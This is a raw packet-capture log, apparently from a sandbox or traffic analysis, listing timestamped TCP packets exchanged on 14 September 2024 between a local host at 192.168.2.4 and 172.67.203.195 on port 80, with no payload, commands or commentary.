                                        Sep 14, 2024 18:31:14.665230036 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665251017 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.665281057 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665313005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665335894 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.665365934 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665399075 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665422916 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.665453911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665489912 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665510893 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.665540934 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665574074 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665596008 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.665625095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665658951 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665678978 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.665709972 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665741920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665760994 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.665792942 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665826082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665858030 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.665878057 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665910006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665930986 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.665961027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.665992022 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666013002 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666045904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666076899 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666096926 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666127920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666160107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666179895 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666212082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666248083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666268110 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666297913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666330099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666357040 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666384935 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666419029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666440964 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666459084 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666490078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666523933 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666551113 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666579008 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666613102 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666635036 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666666985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666698933 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666721106 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666752100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666784048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666805029 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666836977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666870117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666892052 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.666922092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666954994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.666976929 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.667007923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.667047977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.667079926 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.716804028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.716876030 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.716960907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717034101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717068911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717099905 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717099905 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717160940 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717194080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717250109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717283964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717307091 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717358112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717391968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717412949 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717444897 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717477083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717498064 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717529058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717561007 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717581034 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717616081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717669964 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717694044 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717727900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717760086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717781067 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717813969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717848063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717868090 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717899084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717926979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.717951059 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.717981100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.718014002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.718034029 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.718063116 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.718096018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.718116045 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.718147039 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.718183041 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.718202114 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.750220060 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750356913 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.750389099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750448942 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750503063 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.750530005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750581026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750614882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750652075 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.750670910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750726938 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.750746965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750781059 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750813961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750855923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750870943 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.750912905 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.750940084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.750973940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751007080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751028061 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751060963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751092911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751117945 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751148939 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751180887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751200914 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751231909 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751265049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751285076 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751315117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751365900 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751430988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751463890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751496077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751517057 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751571894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751605034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751624107 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751657009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751688004 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751708031 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751739025 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751771927 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751796961 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751826048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751887083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751900911 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.751930952 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751965046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.751988888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752038002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752069950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752089977 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752120972 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752151966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752172947 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752207041 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752238989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752262115 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752293110 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752325058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752343893 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752374887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752408028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752430916 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752460957 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752494097 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752515078 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752547026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752578974 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752599001 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752634048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752665043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752686024 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752716064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752748966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752769947 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752799988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752832890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752852917 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752883911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752917051 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.752937078 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.752968073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753001928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753036022 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753060102 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753098011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753110886 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753143072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753176928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753197908 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753232956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753261089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753281116 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753312111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753345013 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753376961 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753407955 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753441095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753460884 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753494024 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753526926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753547907 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753577948 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753611088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753631115 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753660917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753693104 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753712893 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753741980 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753772974 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753798962 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753829002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753860950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753881931 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753912926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753945112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.753964901 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.753995895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.754030943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.754050016 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.797071934 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.803504944 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.803617954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.803648949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.803682089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.803735018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.803767920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.803797007 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.803833961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.803854942 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.803905964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.803940058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.803962946 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804013014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804045916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804066896 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804097891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804147959 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804172039 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804203987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804238081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804265022 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804291964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804323912 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804358006 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804378033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804415941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804435968 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804465055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804497957 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804521084 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804549932 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804584026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804604053 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804632902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804667950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804687977 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804718971 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804752111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804771900 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804802895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804833889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804853916 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.804888010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.804943085 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.836895943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.836940050 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837019920 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837049961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837106943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837160110 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837184906 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837218046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837251902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837275028 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837307930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837342024 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837364912 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837416887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837450981 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837472916 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837522030 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837577105 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837594986 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837646961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837681055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837702036 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837732077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837765932 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837798119 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837826014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837860107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837881088 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837912083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837944031 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.837964058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.837995052 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838042974 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.838067055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838146925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838202000 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.838231087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838285923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838319063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838340998 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.838371992 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838406086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838426113 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.838458061 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838490009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838510036 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.838560104 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838597059 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838618040 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.838648081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838680983 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838702917 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.838733912 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838766098 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838818073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838855982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.838855982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.838895082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838927031 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838962078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.838983059 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:14.839013100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.839045048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:14.839066029 CEST4973880192.168.2.4172.67.203.195
